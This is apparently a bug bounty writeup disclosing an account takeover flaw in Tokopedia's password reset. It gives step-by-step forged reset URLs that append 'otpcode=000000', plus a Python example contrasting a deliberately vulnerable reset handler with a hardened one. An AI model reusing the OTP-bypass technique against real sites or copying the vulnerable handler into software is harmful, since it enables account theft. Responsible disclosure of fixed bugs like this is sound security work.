Tokopedia Account Takeover Bug Worth 8 Million IDR
Hi Infosec community,
In October I was searching for bug bounty programs through Google dorks and landed on this link.
I went through the terms and conditions, started hunting for bugs, and within an hour found an account takeover bug.
Steps To Reproduce:
Victim email of the Tokopedia account: ezgcmmfgc@champmails.com
1. Go to https://accounts.tokopedia.com/reset-password
2. Enter the victim account's email address and click the Continue button. Then select email as the verification method.
3. Copy the full URL from the address bar. It looks like: https://accounts.tokopedia.com/otp/c/page?otp_type=132&email=ezgcmmfgc%40champmails.com&ld=https://accounts.tokopedia.com/resetpassword?e=ZXpnY21tZmdjQGNoYW1wbWFpbHMuY29t
4. In the above URL, note the password reset URL, which starts after the “ld” parameter:
https://accounts.tokopedia.com/resetpassword?e=ZXpnY21tZmdjQGNoYW1wbWFpbHMuY29t
5. Append “&otpcode=000000” to the end of the password reset URL. For example:
https://accounts.tokopedia.com/resetpassword?e=ZXpnY21tZmdjQGNoYW1wbWFpbHMuY29t&otpcode=000000
6. Open the above URL and enter a password of your choice. The victim's Tokopedia account is now taken over.
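To make the failure concrete from the defender's side, here is an added Python example; it is not Tokopedia's code, and the report does not reveal the internal cause of the bug. It models a hypothetical reset handler that accepts a sentinel otpcode of 000000 alongside the real code, next to a hardened handler that requires a server-issued OTP, compares it in constant time and consumes it on first use. The in-memory OTP store, the password table and the sentinel mechanism are assumptions made for illustration.

```python
import base64
import hmac
import secrets
from urllib.parse import parse_qs, urlparse

# Constructed in-memory stand-ins for the server's OTP store and user table.
PENDING_OTPS = {}
PASSWORDS = {}

def issue_otp(email: str) -> str:
    """Verification step: issue a fresh 6-digit OTP for the account (assumed flow)."""
    code = f"{secrets.randbelow(10**6):06d}"
    PENDING_OTPS[email] = code
    return code

def parse_reset_url(url: str):
    """Decode the reset URL from the writeup: 'e' is the base64 e-mail,
    'otpcode' is the value appended to the link by the client."""
    q = parse_qs(urlparse(url).query)
    email = base64.b64decode(q["e"][0]).decode()
    return email, q.get("otpcode", [None])[0]

def reset_password_vulnerable(url: str, new_password: str) -> bool:
    """Hypothetical flawed handler: a sentinel "000000" is accepted alongside the
    real OTP, so a forged link with otpcode=000000 passes without the e-mail step."""
    email, otpcode = parse_reset_url(url)
    if otpcode is not None and otpcode in ("000000", PENDING_OTPS.get(email)):
        PASSWORDS[email] = new_password
        return True
    return False

def reset_password_hardened(url: str, new_password: str) -> bool:
    """Fixed handler: an OTP must exist server-side for this account, is compared
    in constant time, and is deleted on first use so the link cannot be replayed."""
    email, otpcode = parse_reset_url(url)
    expected = PENDING_OTPS.get(email)
    if expected is None or otpcode is None:
        return False
    if not hmac.compare_digest(expected.encode(), otpcode.encode()):
        return False
    del PENDING_OTPS[email]
    PASSWORDS[email] = new_password
    return True

# The forged link exactly as built in the writeup (victim e-mail base64-encoded in 'e').
FORGED = ("https://accounts.tokopedia.com/resetpassword"
          "?e=ZXpnY21tZmdjQGNoYW1wbWFpbHMuY29t&otpcode=000000")
```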
Video POC:
Timeline:
14-Oct-2018: Reported
15-Oct-2018: Received Response
“Hi,
Thank you for waiting. Your report has been verified, and it’s a valid security bug with Critical Severity. We are still fixing this bug, please be patient.”
17-Oct-2018: Fixed
17-Oct-2018: 8 Million IDR Rewarded
6-Dec-2018: Received Bounty.
Twitter : https://twitter.com/ironfisto
A few more account takeover writeups are coming. Thanks for reading. Bye